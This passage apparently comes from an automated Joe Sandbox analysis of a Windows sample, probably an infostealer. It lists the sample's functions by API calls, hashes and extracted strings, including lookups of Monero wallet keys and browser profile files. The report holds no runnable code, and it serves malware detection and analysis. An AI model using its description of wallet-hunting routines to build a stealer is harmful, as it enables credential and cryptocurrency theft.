                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009515B8,00950D96), ref: 0093F71E
                                • StrCmpCA.SHLWAPI(?,009515BC), ref: 0093F76F
                                • StrCmpCA.SHLWAPI(?,009515C0), ref: 0093F785
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0093FAB1
                                • FindClose.KERNEL32(000000FF), ref: 0093FAC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: prefs.js
                                • API String ID: 3334442632-3783873740
                                • Opcode ID: 6f1a3ec6a4a384a5c7e4a96146e287a3789cfc306f870819ba4339e4022723d2
                                • Instruction ID: 06262b907ada2e9d7e2a68509d8d0cc80a6ae24f786b7349520b994568c3e59f
                                • Opcode Fuzzy Hash: 6f1a3ec6a4a384a5c7e4a96146e287a3789cfc306f870819ba4339e4022723d2
                                • Instruction Fuzzy Hash: BDB1F0719502189BDB24EF64DC96FEE7379AFD4304F4085A8A40A97291EF306B49CF92
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0095510C,?,?,?,009551B4,?,?,00000000,?,00000000), ref: 00931923
                                • StrCmpCA.SHLWAPI(?,0095525C), ref: 00931973
                                • StrCmpCA.SHLWAPI(?,00955304), ref: 00931989
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00931D40
                                • DeleteFileA.KERNEL32(00000000), ref: 00931DCA
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00931E20
                                • FindClose.KERNEL32(000000FF), ref: 00931E32
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 1415058207-1173974218
                                • Opcode ID: 16a05224194079d20c8484bd30d03077433b46d115262a200d275c2904cdfa78
                                • Instruction ID: 8f49c196bfd66fb8b2588734b0d06a5cf148757edef77a5be472efd8fcea1087
                                • Opcode Fuzzy Hash: 16a05224194079d20c8484bd30d03077433b46d115262a200d275c2904cdfa78
                                • Instruction Fuzzy Hash: 61122071950118ABEB29FB60CC96FEE7378EF94304F414599B50A62191EF306F89CFA1
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00950C2E), ref: 0093DE5E
                                • StrCmpCA.SHLWAPI(?,009514C8), ref: 0093DEAE
                                • StrCmpCA.SHLWAPI(?,009514CC), ref: 0093DEC4
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0093E3E0
                                • FindClose.KERNEL32(000000FF), ref: 0093E3F2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                • String ID: \*.*
                                • API String ID: 2325840235-1173974218
                                • Opcode ID: 6a2c5d8af793bf5bda2ce18cf50638519f55a06908f9d87b57350c2ee6299864
                                • Instruction ID: 9575d49eea3461f11a1de5316233e31917534f3dea1efdad2fedb669aef7fb54
                                • Opcode Fuzzy Hash: 6a2c5d8af793bf5bda2ce18cf50638519f55a06908f9d87b57350c2ee6299864
                                • Instruction Fuzzy Hash: B6F19D719541189AEB29EB60DC95FEE7338FF94304F8141D9B40A62191EF306F8ACF66
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009514B0,00950C2A), ref: 0093DAEB
                                • StrCmpCA.SHLWAPI(?,009514B4), ref: 0093DB33
                                • StrCmpCA.SHLWAPI(?,009514B8), ref: 0093DB49
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0093DDCC
                                • FindClose.KERNEL32(000000FF), ref: 0093DDDE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID:
                                • API String ID: 3334442632-0
                                • Opcode ID: 2ba05d426389289720a977b181fadf476821f966282bb70babdefdbe6fbbd6bc
                                • Instruction ID: c010cc819bab9768bb3179c51ec93cdcb64036219b001587016220d244e3409d
                                • Opcode Fuzzy Hash: 2ba05d426389289720a977b181fadf476821f966282bb70babdefdbe6fbbd6bc
                                • Instruction Fuzzy Hash: 23912072900104ABDB14FBB0EC96EED737DABC4304F408668F91A96191EE349B59CF92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ,Jv?$;@e}$>Q,]$gNi$zL/$l?$"{$mN~$o
                                • API String ID: 0-419573658
                                • Opcode ID: 0f4e1fd0eeeba449375f9e2be009b8c304aee6eae3e8f386791429748dd375ec
                                • Instruction ID: 46515f39747c500d201bcbbb0dad1e394f4d8933bf78ab56f847794eb2478a7d
                                • Opcode Fuzzy Hash: 0f4e1fd0eeeba449375f9e2be009b8c304aee6eae3e8f386791429748dd375ec
                                • Instruction Fuzzy Hash: 71B23AF3A086049FE304AE2DEC8567ABBE5EF94320F16463DEAC4C7744E93598058797
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: "]?$,{}$D*}?$E>~$`Os$gB~|$p{/_$q2]k
                                • API String ID: 0-411262055
                                • Opcode ID: c38fa224c1302b24ca130e0d1a27b8b47960a1510880ac5d0f469cf3b3cf1e99
                                • Instruction ID: e091fdc603d7084d14614bd5e8b4eb8f4e2d6be5e99908f8dc3345466fc033e3
                                • Opcode Fuzzy Hash: c38fa224c1302b24ca130e0d1a27b8b47960a1510880ac5d0f469cf3b3cf1e99
                                • Instruction Fuzzy Hash: 3EB2F7F3A0C2009FE704AE29EC8567AB7E5EF94720F16893DEAC4C7744E63598418797
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • GetKeyboardLayoutList.USER32(00000000,00000000,009505AF), ref: 00947BE1
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00947BF9
                                • GetKeyboardLayoutList.USER32(?,00000000), ref: 00947C0D
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00947C62
                                • LocalFree.KERNEL32(00000000), ref: 00947D22
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: 8be94cc05d86d1489b8844bfdbd07df7a9c42b7ef37910303d1a56e07abee4ce
                                • Instruction ID: 46afba87aae3706da6a523100a0507fbf639b7dd654981416b19dd0dad0f1259
                                • Opcode Fuzzy Hash: 8be94cc05d86d1489b8844bfdbd07df7a9c42b7ef37910303d1a56e07abee4ce
                                • Instruction Fuzzy Hash: F041397194021CABDB24DB94DC99FEEB3B8FF84705F204199E50A62291DB342F85CFA1
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00950D73), ref: 0093E4A2
                                • StrCmpCA.SHLWAPI(?,009514F8), ref: 0093E4F2
                                • StrCmpCA.SHLWAPI(?,009514FC), ref: 0093E508
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0093EBDF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 433455689-1173974218
                                • Opcode ID: c351e0ab33e69bd2e1741680c34592232747621a59accc69d4d7b4591a3cace2
                                • Instruction ID: c9dfda24b818054dd9d34a4e867cba153c74cb6da39ee6a1190b7db1bc026e3c
                                • Opcode Fuzzy Hash: c351e0ab33e69bd2e1741680c34592232747621a59accc69d4d7b4591a3cace2
                                • Instruction Fuzzy Hash: 21124172950118AAEB28FB60DC96FED7338AFD4304F4045A8B50A96191EF306F49CF92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: $03$.p{$6my$B5$!L"$!L"
                                • API String ID: 0-3844536532
                                • Opcode ID: a22c92d3112574be6d86b271ebc94996e5190923a6721ebf48284172eeeb12b5
                                • Instruction ID: 823f703246e452c933e60f117cc9605b4e7c106f05ebc69dac8e07c509cc9c57
                                • Opcode Fuzzy Hash: a22c92d3112574be6d86b271ebc94996e5190923a6721ebf48284172eeeb12b5
                                • Instruction Fuzzy Hash: 6CB209F390C2049FE304AE2DEC8567ABBE5EF94720F1A493DEAC4C3744EA7558058697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !k}$:L[w$JwJ$a^}o$l=h<
                                • API String ID: 0-3146314459
                                • Opcode ID: 913b7a8b5e80b9948bf26fc1d987fba2ca176051bf3e13730bcd6c90b1031172
                                • Instruction ID: 09f389aab57dfd6d37d51c833547cb9337a5da9930a48b36de96b2f0f68c7da8
                                • Opcode Fuzzy Hash: 913b7a8b5e80b9948bf26fc1d987fba2ca176051bf3e13730bcd6c90b1031172
                                • Instruction Fuzzy Hash: A3A2D4F350C200AFE704AE2DEC8167ABBE9EF94720F16493DEAC5C7744E63598148697
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0093C871
                                • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0093C87C
                                • lstrcat.KERNEL32(?,00950B46), ref: 0093C943
                                • lstrcat.KERNEL32(?,00950B47), ref: 0093C957
